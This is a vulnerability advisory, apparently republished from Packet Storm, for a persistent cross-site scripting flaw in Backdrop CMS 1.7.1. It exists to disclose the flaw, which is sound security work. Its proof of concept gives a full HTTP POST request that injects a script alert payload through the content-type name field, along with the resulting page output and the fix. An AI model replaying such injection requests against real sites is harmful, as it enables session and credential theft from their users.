Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Backdrop CMS 1.7.1 Cross Site Scripting

🗓️ 23 Aug 2017 00:00:00Reported by Manuel Garcia CardenasType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 42 Views

Backdrop CMS 1.7.1 Persistent Cross-Site Scripting vulnerability discovered by Manuel Garcia Cardenas allows execution of arbitrary HTML/script code

Code
`=============================================  
MGC ALERT 2017-005  
- Original release date: July 11, 2017  
- Last revised: August 18, 2017  
- Discovered by: Manuel Garcia Cardenas  
- Severity: 4,8/10 (CVSS Base Score)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting  
  
II. BACKGROUND  
-------------------------  
Backdrop CMS is a simple, lightweight, and easy to use Content Management  
System used to build attractive, professional websites.  
  
III. DESCRIPTION  
-------------------------  
Has been detected a Persistent XSS vulnerability in Backdrop CMS, that  
allows the execution of arbitrary HTML/script code to be executed in the  
context of the victim user's browser.  
  
IV. PROOF OF CONCEPT  
-------------------------  
Go to: Structure -> Content types -> Add content type  
  
And post:  
  
POST /backdrop/admin/structure/types/add HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101  
Firefox/54.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 605  
Referer: http://127.0.0.1/backdrop/admin/structure/types/add  
Cookie: Backdrop.tableDrag.showWeight=0;  
PHPSESSID=libl3ge64tv5vajangccjhifu2; phpwcmsBELang=en;  
phpwcmsBEItemsPerPage=50; _ctr=MTI3XzBfMF8xLlpa;  
nv4_cltz=120.60.120%257C%252F%257C;  
nv4_cltn=RXVyb3BlL0Ftc3RlcmRhbS43MjAwLjE%3D;  
nv4c_x4OOk_ctr=MTI3XzBfMF8xLlpa; nv4c_x4OOk_cltz=120.60.120%257C%252F%257C;  
gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0;  
gnew_language=english; gnew_template=clean;  
SESSaca5a63f4c2fc739381fab7741d68783=X4OPoKhvYQz8Q8QwCrVpgq3JuG4fQ84n1XpQQH0SCjo  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&type=test_script_alert&description=&title_label=Demo&help=&status_default=1&sticky_enabled=1&promote_enabled=1&path_pattern=%5Bnode%3Acontent-type%5D%2F%5Bnode%3Atitle%5D&revision_enabled=1&node_submitted=1&node_user_picture=1&comment_default=2&comment_per_page=50&comment_mode=1&comment_user_picture=1&comment_form_location=1&comment_preview=1&additional_settings__active_tab=&form_build_id=form-biLaugWmv7Z4fGmSK73PYxQZo7hgIwxL2gRwijtrBFA&form_token=j4801oRGZnTQshQQdJ1IKF7-doK6IhB51F1d4nIPwY4&form_id=node_type_form&op=Save+and+add+fields  
  
The variable "name" it is not sanitized, later, if you go to the content  
type created and click in "Manage Displays"  
  
GET /backdrop/admin/structure/types/manage/test-script-alert/display  
HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101  
Firefox/54.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
  
The XSS is executed, in the response you can view:  
  
Manage display</a></li></ul></div></div></td> </tr><tr class="header  
even"><td>Customized for test"><script>alert(/XSS/)</script></td><td  
class="priority-low"></td><td></td> </tr>  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted user's  
browser, this can leverage to steal sensitive information as user  
credentials, personal data, etc.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Backdrop CMS <= 1.7.1  
  
VII. SOLUTION  
-------------------------  
Install the last release:  
https://github.com/backdrop/backdrop/releases/tag/1.7.2  
  
VIII. REFERENCES  
-------------------------  
https://backdropcms.org/security/backdrop-sa-core-2017-009  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
July 11, 2017 1: Initial release  
August 18, 2017 2: Last revision  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas  
July 11, 2017 2: Send to vendor  
August 17, 2017 3: Vendo fix in 1.7.2 version  
August 18, 2017 4: Sent to lists  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
  
XIII. ABOUT  
-------------------------  
Manuel Garcia Cardenas  
Pentester  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Aug 2017 00:00Current
backdrop cmscross-site scriptingmanuel garcia cardenasvulnerabilityseverity 4.8/10htmlscriptexploitsecurityreleasesolutiongithubreferences
42